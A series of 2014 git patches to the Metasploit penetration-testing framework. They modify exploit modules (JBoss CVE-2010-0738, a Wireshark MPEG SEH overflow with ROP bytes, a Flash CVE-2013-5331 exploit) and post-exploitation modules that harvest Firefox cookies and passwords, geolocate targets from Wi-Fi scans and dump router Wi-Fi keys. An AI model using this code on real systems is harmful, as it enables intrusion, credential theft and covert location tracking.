ec1f7d644cda80d99ec9ae94675d8f9a9ea96a1c Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Wed, 23 Apr 2014 23:03:02 -0400 Subject: [PATCH 155/853] Support deprecation information from constants --- lib/msf/core/module/deprecated.rb | 33 ++++++++++++++++--- .../stagers/windows/reverse_ipv6_http.rb | 6 +++- .../stagers/windows/reverse_ipv6_https.rb | 6 ++++ 3 files changed, 40 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/module/deprecated.rb b/lib/msf/core/module/deprecated.rb index 2dee7bfddd..90cd666a3e 100644 --- a/lib/msf/core/module/deprecated.rb +++ b/lib/msf/core/module/deprecated.rb @@ -33,18 +33,34 @@ module Msf::Module::Deprecated end # (see ClassMethods#replacement_module) - def replacement_module; self.class.replacement_module; end + def replacement_module + if self.class.instance_variable_defined?(:@replacement_module) + return self.class.replacement_module + elsif self.class.const_defined?(:DEPRECATION_REPLACEMENT) + return self.class.const_get(:DEPRECATION_REPLACEMENT) + end + end + # (see ClassMethods#deprecation_date) - def deprecation_date; self.class.deprecation_date; end + def deprecation_date + if self.class.instance_variable_defined?(:@deprecation_date) + return self.class.deprecation_date + elsif self.class.const_defined?(:DEPRECATION_DATE) + return self.class.const_get(:DEPRECATION_DATE) + end + end # Extends with {ClassMethods} def self.included(base) base.extend(ClassMethods) end - def setup + # Print the module deprecation information + # + # @return [void] + def print_deprecation_warning print_warning("*"*72) - print_warning("*%red"+"This module is deprecated!".center(70)+"%clr*") + print_warning("*%red"+"The module #{refname} is deprecated!".center(70)+"%clr*") if deprecation_date print_warning("*"+"It will be removed on or about #{deprecation_date}".center(70)+"*") end @@ -52,6 +68,15 @@ module Msf::Module::Deprecated print_warning("*"+"Use #{replacement_module} instead".center(70)+"*") end print_warning("*"*72) + end + + def generate + print_deprecation_warning + super + end + + def setup + print_deprecation_warning super end diff --git a/modules/payloads/stagers/windows/reverse_ipv6_http.rb b/modules/payloads/stagers/windows/reverse_ipv6_http.rb index d4dd790a69..1a1afd3dfa 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_http.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_http.rb @@ -6,12 +6,16 @@ require 'msf/core' require 'msf/core/handler/reverse_ipv6_http' - +require 'msf/core/module/deprecated' module Metasploit3 include Msf::Payload::Stager include Msf::Payload::Windows + include Msf::Module::Deprecated + + DEPRECATION_DATE = Date.new(2014, 7, 30) + DEPRECATION_REPLACEMENT = 'windows/meterpreter/reverse_https' def initialize(info = {}) super(merge_info(info, diff --git a/modules/payloads/stagers/windows/reverse_ipv6_https.rb b/modules/payloads/stagers/windows/reverse_ipv6_https.rb index fd0206c91c..f2c7c3e40a 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_https.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_https.rb @@ -3,13 +3,19 @@ # Current source: https://github.com/rapid7/metasploit-framework ## + require 'msf/core' require 'msf/core/handler/reverse_ipv6_https' +require 'msf/core/module/deprecated' module Metasploit3 include Msf::Payload::Stager include Msf::Payload::Windows + include Msf::Module::Deprecated + + DEPRECATION_DATE = Date.new(2014, 7, 30) + DEPRECATION_REPLACEMENT = 'windows/meterpreter/reverse_https' def initialize(info = {}) super(merge_info(info, From d4c0d015c1d279bbe3061f9f4dbdb697b0521b11 Mon Sep 17 00:00:00 2001 From: Tom Sellers Date: Thu, 24 Apr 2014 07:04:50 -0500 Subject: [PATCH 156/853] Update wlan_geolocate.rb Updated based on feedback. Also added enumeration only support for BSD and Solaris. --- modules/post/multi/gather/wlan_geolocate.rb | 168 +++++++++++++------- 1 file changed, 112 insertions(+), 56 deletions(-) diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb index b959960fbe..f3c7f957e7 100644 --- a/modules/post/multi/gather/wlan_geolocate.rb +++ b/modules/post/multi/gather/wlan_geolocate.rb @@ -12,15 +12,21 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Multiplatform Wireless LAN Geolocation', - 'Description' => %q{ Geolocate the target device by gathering local - wireless networks and performing a lookup against Google APIs.}, + 'Name' => 'Multiplatform WLAN Enumeration and Geolocation', + 'Description' => %q{ Enumerate wireless networks visible to the target device. + Optionally geolocate the target by gathering local wireless networks and + performing a lookup against Google APIs.}, 'License' => MSF_LICENSE, 'Author' => [ 'Tom Sellers fadedcode.net>'], - 'Platform' => %w{ osx win linux }, + 'Platform' => %w{ osx win linux bsd solaris }, 'SessionTypes' => [ 'meterpreter', 'shell' ], )) + register_options( + [ + OptBool.new('GEOLOCATE', [ false, 'Use Google APIs to geolocate Linux, Windows, and OS X targets.', false]) + ], self.class) + end def get_strength(quality) @@ -81,62 +87,13 @@ class Metasploit3 < Msf::Post return wlan_list end + def perform_geolocation(wlan_list) - # Run Method for when run command is issued - def run - if session.type =~ /shell/ - # Use the shell platform for selecting the command - platform = session.platform - else - # For Meterpreter use the sysinfo OS since java Meterpreter returns java as platform - platform = session.sys.config.sysinfo['OS'] - end - - - case platform - when /win/i - - listing = cmd_exec('netsh wlan show networks mode=bssid') - if listing.nil? - print_error("Unable to generate wireless listing..") - return nil - else - store_loot("host.windows.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") - wlan_list = parse_wireless_win(listing) - end - - when /osx/i - - listing = cmd_exec('/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s') - if listing.nil? - print_error("Unable to generate wireless listing..") - return nil - else - store_loot("host.osx.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") - wlan_list = parse_wireless_osx(listing) - end - - when /linux/i - - listing = cmd_exec('iwlist scanning') - if listing.nil? - print_error("Unable to generate wireless listing..") - return nil - else - store_loot("host.linux.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") - wlan_list = parse_wireless_linux(listing) - end - else - print_error("The target's platform is not supported at this time.") - return nil - end - - if wlan_list.nil? || wlan_list.empty? + if wlan_list.blank? print_error("Unable to enumerate wireless networks from the target. Wireless may not be present or enabled.") return end - # Build and send the request to Google url = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true#{wlan_list}" uri = URI.parse(URI.encode(url)) @@ -154,9 +111,108 @@ class Metasploit3 < Msf::Post print_status("Google indicates that the target is within #{accuracy} meters of #{latitude},#{longitude}.") print_status("Google Maps URL: https://maps.google.com/?q=#{latitude},#{longitude}") else - print_error("Failure connecting to Google for location lookup") + print_error("Failure connecting to Google for location lookup.") end + end + + + # Run Method for when run command is issued + def run + if session.type =~ /shell/ + # Use the shell platform for selecting the command + platform = session.platform + else + # For Meterpreter use the sysinfo OS since java Meterpreter returns java as platform + platform = session.sys.config.sysinfo['OS'] + end + + + case platform + when /win/i + + listing = cmd_exec('netsh wlan show networks mode=bssid') + if listing.nil? + print_error("Unable to generate wireless listing.") + return nil + else + store_loot("host.windows.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") + # The wireless output does not lend itself to displaying on screen for this platform. + print_status("Wireless list saved to loot.") + if datastore['GEOLOCATE'] + wlan_list = parse_wireless_win(listing) + perform_geolocation(wlan_list) + return + end + end + + when /osx/i + + listing = cmd_exec('/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s') + if listing.nil? + print_error("Unable to generate wireless listing.") + return nil + else + store_loot("host.osx.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") + print_status("Target's wireless networks:\n\n#{listing}\n") + if datastore['GEOLOCATE'] + wlan_list = parse_wireless_osx(listing) + perform_geolocation(wlan_list) + return + end + end + + when /linux/i + + listing = cmd_exec('iwlist scanning') + if listing.nil? + print_error("Unable to generate wireless listing.") + return nil + else + store_loot("host.linux.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") + # The wireless output does not lend itself to displaying on screen for this platform. + print_status("Wireless list saved to loot.") + if datastore['GEOLOCATE'] + wlan_list = parse_wireless_linux(listing) + perform_geolocation(wlan_list) + return + end + end + + when /solaris/i + + listing = cmd_exec('dladm scan-wifi') + if listing.blank? + print_error("Unable to generate wireless listing.") + return nil + else + store_loot("host.solaris.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") + print_status("Target's wireless networks:\n\n#{listing}\n") + print_error("Geolocation is not supported on this platform.\n\n") if datastore['GEOLOCATE'] + return + end + + when /bsd/i + + interface = cmd_exec("dmesg | grep -i wlan | cut -d ':' -f1 | uniq") + # Printing interface as this platform requires the interface to be specified + # it might not be detected correctly. + print_status("Found wireless interface: #{interface}") + listing = cmd_exec("ifconfig #{interface} scan") + if listing.blank? + print_error("Unable to generate wireless listing.") + return nil + else + store_loot("host.bsd.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") + print_status("Target's wireless networks:\n\n#{listing}\n") + print_error("Geolocation is not supported on this platform.\n\n") if datastore['GEOLOCATE'] + return + end + + else + print_error("The target's platform, #{platform}, is not supported at this time.") + return nil + end rescue Rex::TimeoutError, Rex::Post::Meterpreter::RequestError rescue ::Exception => e From 8f47edb8998429d6a02ce979b57790c4ffd1531f Mon Sep 17 00:00:00 2001 From: Tom Sellers Date: Thu, 24 Apr 2014 12:37:14 -0500 Subject: [PATCH 157/853] JBoss_Maindeployer: improve feedback against CVE-2010-0738 The exploit against CVE-2010-0738 won't work when using GET or POST. In the existing code the request would fail and the function would return a nil. This would be passed to detect_platform without being checked and cause the module to crash ungracefully with the error: Exploit failed: NoMethodError undefined method `body' for nil:NilClass The first changes detect a 401 authentication message and provide useful feedback. Given that if, in any case, 'res' is not a valid or useful response the second change just terminates processing. I've stayed with the module's coding style for consistency. --- modules/exploits/multi/http/jboss_maindeployer.rb | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index 1ef454ed64..77b3a3b126 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -315,9 +315,12 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => path }, 20) + if (res) && (res.code == 401) + fail_with(Failure::NoAccess,"Unable to bypass authentication. Try changing the verb to HEAD to exploit CVE-2010-0738.") + end + if (not res) or (res.code != 200) - print_error("Failed: Error requesting #{path}") - return nil + fail_with(Failure::Unknown,"Failed: Error requesting #{path}") end res From 2e76db01d7a3923a51ff73047d7c07e4a9da1da2 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 24 Apr 2014 13:15:12 -0500 Subject: [PATCH 158/853] Try to stick to the 100 columns per line rule --- modules/exploits/windows/misc/wireshark_mpeg_overflow.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 16f1f81771..4678451385 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote packet << "\x6c\x7d\x37\x6c" # NOP RETN packet << "\x6c\x7d\x37\x6c" # NOP RETN packet << ropchain - packet << payload.encoded # Shellcode + packet << payload.encoded # Shellcode packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) # 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000 @@ -125,7 +125,8 @@ class Metasploit3 < Msf::Exploit::Remote # When file is open with GUI interface. This is NSEH/SEH overwrite packet << make_nops(4) # nseh - packet << "\x55\x59\x80\x6b" # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** + # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** + packet << "\x55\x59\x80\x6b" print_status("Preparing payload") filecontent = magic_header From ba8d7801f4758eceff0d8950814921cf2060bdb3 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 24 Apr 2014 13:15:49 -0500 Subject: [PATCH 159/853] Remove default target because there is no auto-select --- modules/exploits/windows/misc/wireshark_mpeg_overflow.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 4678451385..21664b9d7b 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -63,8 +63,8 @@ class Metasploit3 < Msf::Exploit::Remote ], ], 'Privileged' => false, - 'DisclosureDate' => 'Mar 20 2014', - 'DefaultTarget' => 1)) + 'DisclosureDate' => 'Mar 20 2014' + )) register_options( [ From a39855e20d9265e3292c5e930b8d5c01fb184ac8 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 24 Apr 2014 13:16:24 -0500 Subject: [PATCH 160/853] Works for XP SP3 too --- modules/exploits/windows/misc/wireshark_mpeg_overflow.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 21664b9d7b..dc4146c897 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote 'jmpesp' => 0x68e2bfb9, } ], - [ 'WinXP SP2 English (bypass DEP)', + [ 'WinXP SP2/SP3 English (bypass DEP)', { 'OffSet2' => 70692, 'OffSet' => 70476, From cde9080a6aa90b16ee57a8fd83923187d13249c3 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 24 Apr 2014 13:17:08 -0500 Subject: [PATCH 161/853] Move module to fileformat --- .../windows/{misc => fileformat}/wireshark_mpeg_overflow.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/windows/{misc => fileformat}/wireshark_mpeg_overflow.rb (100%) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb similarity index 100% rename from modules/exploits/windows/misc/wireshark_mpeg_overflow.rb rename to modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb From f94d1f6546ce9ee9e02e2e018b8c1cc519c2bcff Mon Sep 17 00:00:00 2001 From: joev Date: Thu, 24 Apr 2014 15:07:48 -0500 Subject: [PATCH 162/853] Refactors firefox js usage into a mixin. --- .../exploit/remote/firefox_privilege_escalation.rb | 12 +++++++++++- .../browser/webview_addjavascriptinterface.rb | 2 +- modules/post/firefox/gather/cookies.rb | 13 +++++++------ modules/post/firefox/gather/history.rb | 6 +----- modules/post/firefox/gather/passwords.rb | 4 +--- modules/post/firefox/gather/xss.rb | 5 ++--- 6 files changed, 23 insertions(+), 19 deletions(-) diff --git a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb index b03172c234..b36e245414 100644 --- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb +++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb @@ -9,7 +9,17 @@ module Msf module Exploit::Remote::FirefoxPrivilegeEscalation - + + # Sends the +js+ code to the remote session, which executes it in Firefox's + # privileged javascript context + # @return [String] the results that were sent back. This can be achieved through + # calling the "send" function, or by just returning the value in +js+ + def js_exec(js) + print_status "Running the privileged javascript..." + session.shell_write("[JAVASCRIPT]#{js}[/JAVASCRIPT]") + session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) + end + # Puts the shellcode into memory, adds X flag, and calls it # The js function throws on error # @return [String] javascript code containing the execShellcode() javascript fn diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 40c5461117..1ebd1204d8 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -117,4 +117,4 @@ class Metasploit3 < Msf::Exploit::Remote def html "" end -end +end \ No newline at end of file diff --git a/modules/post/firefox/gather/cookies.rb b/modules/post/firefox/gather/cookies.rb index ce6c5a69e7..18cefbef6f 100644 --- a/modules/post/firefox/gather/cookies.rb +++ b/modules/post/firefox/gather/cookies.rb @@ -5,11 +5,9 @@ require 'json' require 'msf/core' -require 'msf/core/payload/firefox' class Metasploit3 < Msf::Post - include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info={}) @@ -29,12 +27,14 @@ class Metasploit3 < Msf::Post end def run - print_status "Running the privileged javascript..." - session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]") - results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) + results = js_exec(js_payload) if results.present? begin cookies = JSON.parse(results) + cookies.each do |entry| + entry.keys.each { |k| entry[k] = Rex::Text.decode_base64(entry[k]) } + end + file = store_loot("firefox.cookies.json", "text/json", rhost, results) print_good("Saved #{cookies.length} cookies to #{file}") rescue JSON::ParserError => e @@ -47,6 +47,7 @@ class Metasploit3 < Msf::Post %Q| (function(send){ try { + var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa; var cookieManager = Components.classes["@mozilla.org/cookiemanager;1"] .getService(Components.interfaces.nsICookieManager); var cookies = []; @@ -54,7 +55,7 @@ class Metasploit3 < Msf::Post while (iter.hasMoreElements()){ var cookie = iter.getNext(); if (cookie instanceof Components.interfaces.nsICookie){ - cookies.push({host:cookie.host, name:cookie.name, value:cookie.value}) + cookies.push({host:b64(cookie.host), name:b64(cookie.name), value:b64(cookie.value)}) } } send(JSON.stringify(cookies)); diff --git a/modules/post/firefox/gather/history.rb b/modules/post/firefox/gather/history.rb index 75808963c0..1db4ed7993 100644 --- a/modules/post/firefox/gather/history.rb +++ b/modules/post/firefox/gather/history.rb @@ -5,11 +5,9 @@ require 'json' require 'msf/core' -require 'msf/core/payload/firefox' class Metasploit3 < Msf::Post - include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info={}) @@ -30,9 +28,7 @@ class Metasploit3 < Msf::Post end def run - print_status "Running the privileged javascript..." - session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]") - results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) + results = js_exec(js_payload) if results.present? begin history = JSON.parse(results) diff --git a/modules/post/firefox/gather/passwords.rb b/modules/post/firefox/gather/passwords.rb index d3db014177..24130d0f4e 100644 --- a/modules/post/firefox/gather/passwords.rb +++ b/modules/post/firefox/gather/passwords.rb @@ -29,9 +29,7 @@ class Metasploit3 < Msf::Post end def run - print_status "Running the privileged javascript..." - session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]") - results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) + results = js_exec(js_payload) if results.present? begin passwords = JSON.parse(results) diff --git a/modules/post/firefox/gather/xss.rb b/modules/post/firefox/gather/xss.rb index 4d2e960e69..63049a2a7b 100644 --- a/modules/post/firefox/gather/xss.rb +++ b/modules/post/firefox/gather/xss.rb @@ -10,6 +10,7 @@ require 'msf/core/payload/firefox' class Metasploit3 < Msf::Post include Msf::Payload::Firefox + include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info={}) super(update_info(info, @@ -36,9 +37,7 @@ class Metasploit3 < Msf::Post end def run - session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]") - results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) - + results = js_exec(js_payload) if results.present? print_good results else From fd232b1acd6184999123d8c4ee184cce4498c585 Mon Sep 17 00:00:00 2001 From: Ramon de C Valle Date: Fri, 25 Apr 2014 01:48:17 -0300 Subject: [PATCH 163/853] Use the protocol version from the handshake I used the protocol version from the record layer thinking I was using the protocol version from the handshake. This commit fix this and uses the protocol version from the handshake instead of from the record layer as in https://gist.github.com/rcvalle/10335282, which is how it should have been initially. Thanks to @wvu-r7 for finding this out! --- .../server/openssl_heartbeat_client_memory.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb index e57c9724c3..f24a46fedf 100644 --- a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb +++ b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb @@ -128,7 +128,7 @@ class Metasploit3 < Msf::Auxiliary # Process cleartext TLS messages def process_openssl_cleartext_request(c, data) - message_type, message_version = data.unpack("Cn") + message_type, message_version, protocol_version = data.unpack("Cn@9n") if message_type == 0x15 and data.length >= 7 message_level, message_reason = data[5,2].unpack("CC") @@ -165,7 +165,7 @@ class Metasploit3 < Msf::Auxiliary @state[c][:received_hello] = true print_status("#{@state[c][:name]} Sending Server Hello...") - openssl_send_server_hello(c, data, message_version) + openssl_send_server_hello(c, data, protocol_version) return end @@ -196,7 +196,7 @@ class Metasploit3 < Msf::Auxiliary else # Send heartbeat requests if @state[c][:heartbeats].length < heartbeat_limit - openssl_send_heartbeat(c, message_version) + openssl_send_heartbeat(c, protocol_version) end # Process cleartext heartbeat replies @@ -216,7 +216,7 @@ class Metasploit3 < Msf::Auxiliary # Process encrypted TLS messages def process_openssl_encrypted_request(c, data) - message_type, message_version = data.unpack("Cn") + message_type, message_version, protocol_version = data.unpack("Cn@9n") return if @state[c][:shutdown] return unless data.length > 5 @@ -237,7 +237,7 @@ class Metasploit3 < Msf::Auxiliary # Send heartbeat requests if @state[c][:heartbeats].length < heartbeat_limit - openssl_send_heartbeat(c, message_version) + openssl_send_heartbeat(c, protocol_version) end # Process heartbeat replies From 8f43c229b102f25b907d10f34f189c92413dc33a Mon Sep 17 00:00:00 2001 From: lsanchez-r7 Date: Fri, 25 Apr 2014 11:15:39 -0500 Subject: [PATCH 164/853] Passing the Mdm::Task down the chain when reporting hosts from an Mdm::Task we need to pass the task all the way down. this wasnt done for the metasploit import format. --- lib/msf/core/db.rb | 5 ++++- lib/msf/core/db_manager/import_msf_xml.rb | 2 ++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index c74b205f0b..16d3bcac8d 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -4222,7 +4222,10 @@ class DBManager parser = Rex::Parser::RetinaXMLStreamParser.new parser.on_found_host = Proc.new do |host| hobj = nil - data = {:workspace => wspace} + data = { + :workspace => wspace, + :task => args[:task] + } addr = host['address'] next if not addr diff --git a/lib/msf/core/db_manager/import_msf_xml.rb b/lib/msf/core/db_manager/import_msf_xml.rb index f3e37b2268..8d70b5e1d0 100644 --- a/lib/msf/core/db_manager/import_msf_xml.rb +++ b/lib/msf/core/db_manager/import_msf_xml.rb @@ -204,6 +204,7 @@ module Msf doc.elements.each("/#{btag}/hosts/host") do |host| host_data = {} + host_data[:task] = args[:task] host_data[:workspace] = wspace host_data[:host] = nils_for_nulls(host.elements["address"].text.to_s.strip) if bl.include? host_data[:host] @@ -247,6 +248,7 @@ module Msf host.elements.each('services/service') do |service| service_data = {} + service_data[:task] = args[:task] service_data[:workspace] = wspace service_data[:host] = hobj service_data[:port] = nils_for_nulls(service.elements["port"].text.to_s.strip).to_i From 696eee1ada198da4bb70ca2d994fe968e373cf19 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 25 Apr 2014 14:27:44 -0500 Subject: [PATCH 165/853] Add Outpost24 to db_import help --- lib/msf/ui/console/command_dispatcher/db.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index f779e4de63..bf3f39eb3d 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1320,6 +1320,7 @@ class Db print_line " NeXpose XML Report" print_line " Nmap XML" print_line " OpenVAS Report" + print_line " Outpost24 XML" print_line " Qualys Asset XML" print_line " Qualys Scan XML" print_line " Retina XML" From 9964548b4180f15a1882d8b106c4151310a6e0a9 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 25 Apr 2014 14:28:29 -0500 Subject: [PATCH 166/853] Amend spec for db_import help --- spec/lib/msf/ui/command_dispatcher/db_spec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/spec/lib/msf/ui/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/command_dispatcher/db_spec.rb index f5dde21917..5b058d4fb3 100644 --- a/spec/lib/msf/ui/command_dispatcher/db_spec.rb +++ b/spec/lib/msf/ui/command_dispatcher/db_spec.rb @@ -237,6 +237,7 @@ describe Msf::Ui::Console::CommandDispatcher::Db do " NeXpose XML Report", " Nmap XML", " OpenVAS Report", + " Outpost24 XML", " Qualys Asset XML", " Qualys Scan XML", " Retina XML" From b80d366bb7fadb50366d8fe834a6fbb84963d5d2 Mon Sep 17 00:00:00 2001 From: nodeofgithub Date: Sat, 26 Apr 2014 15:52:31 +0200 Subject: [PATCH 167/853] Add filter to output WPA-PSK password on Netgear DG834GT --- modules/auxiliary/admin/misc/sercomm_dump_config.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb index 35f7127993..726e183d8b 100644 --- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb +++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb @@ -28,7 +28,8 @@ class Metasploit3 < Msf::Auxiliary ['Wifi Key 1', /wifi_key1=(\S+)/i], ['Wifi Key 2', /wifi_key2=(\S+)/i], ['Wifi Key 3', /wifi_key3=(\S+)/i], - ['Wifi Key 4', /wifi_key4=(\S+)/i] + ['Wifi Key 4', /wifi_key4=(\S+)/i], + ['Wifi PSK PWD', /wifi_psk_pwd=(\S+)/i] ] } From 60e7e9f5152c0d827de29a7914dbc4fd82129ba2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 27 Apr 2014 10:40:46 -0500 Subject: [PATCH 168/853] Add module for CVE-2013-5331 --- data/exploits/CVE-2013-5331/Exploit.swf | Bin 0 -> 5122 bytes .../source/exploits/CVE-2013-5331/Exploit.as | 897 ++++++++++++++++++ .../adobe_flash_filters_type_confusion.rb | 131 +++ 3 files changed, 1028 insertions(+) create mode 100755 data/exploits/CVE-2013-5331/Exploit.swf create mode 100755 external/source/exploits/CVE-2013-5331/Exploit.as create mode 100644 modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb diff --git a/data/exploits/CVE-2013-5331/Exploit.swf b/data/exploits/CVE-2013-5331/Exploit.swf new file mode 100755 index 0000000000000000000000000000000000000000..5dbfe348fb7d6b4347ebc626fc23772953e4d097 GIT binary patch literal 5122 zcmV+d6#eT%S5pq!9{>P&+J#wNY#i5hp52|D*NkD=X~cocc>el|5MK!|9#KfU-C}x zdD8Q|U)%dPCC@w2)%N%oPA|;dxVF^p9mnX!*{l8j^6~lk>({RzyH1aFx>x2S&iOov z=i_(|5_7$q?Y_7%*X}(xd$Le)+VoU+ak;*4((1VFbgzm2NwK`Vw5WtrH-BTUceSJ5zAoM|b9PDeuAZ2GDCpMo z7yC=*7HC^zuoR!ADVbL>ts~dh<<0c#P*zfza-jMR>T!^^33_--Gg!Aqv&Hl z%iWncJ314SC>grpW>3sN678)SB=Dqny7_VCg!f8$b93{{jS4ax;MWgsf7vU3KKk1~ z`R*BH{6~#5HC&-xj0(PF6tY*rbhs72v7sKl*jru_H-op9yNi7@-CnsSP506@(d!|hm)HRvH{xxhx8$dH4=)L=yQbIkb*F8@mph#$BigmD zQD*TS)2$DEYn%SW>m4PQUg@;kSO&z5V3${}z{B2k`(OLBT#GDCS!xr-X_`ezVl9)g zQX-4f*k~RZ&X|r(tY~V8U?i1_<&ow#iUdz=BJ(s$Qi=K45*nupIw?ydp-GfchQ&Eg zKp?q@u?WI~2%~dtk~o!#NV$ka8k0OtImzLMW!gkK<}5RWYA)hDPop@?A}VO6bIEOH zr67_hm1nWliW_6IEHftKN?Xdcm7FG2#ga&yr7EF1$(5u`5Lm@dBTF(VsYxWu<0#Hm zBodkmX<3YwlG=n@B1oKB6{SYRnV|}?keWcVm3XGaWHL&u*13y7sv<43EY*2#h-4}? zxsXa39z}5~sK#PJ6B}!r3Qi-FS!Ohivs|P)Wtq*n%HS}zMFnSxh;)KkYGf)?K~!Xo zh@^@Uh8SCxImcd@h%6QGIL)QXu_zO1rg2dwH(I4h8nK*7iI^nLYXmB@#H5IJY)sB{ z#A2foh4@A)%3#vuk%tQOb?T5}CwAQck&nAGsnd(^B9` z8l@?>WI*OwCYk0Wp&2s3B#jfmj@XE6hFq}R8fH^1A{qlJHckzdmT;Lx zIVaK}CyFPDi5L+&g>ptkEJ(rxwx~18feYj?a`?^(uuLo`sm&!}h#M7|6;#1=La0JC z<2cSZPm|bYJjt?z0gnmbp|#DFFa}773<9L6#g<o*W0}C;wN~$bH$%x#TgeDP# 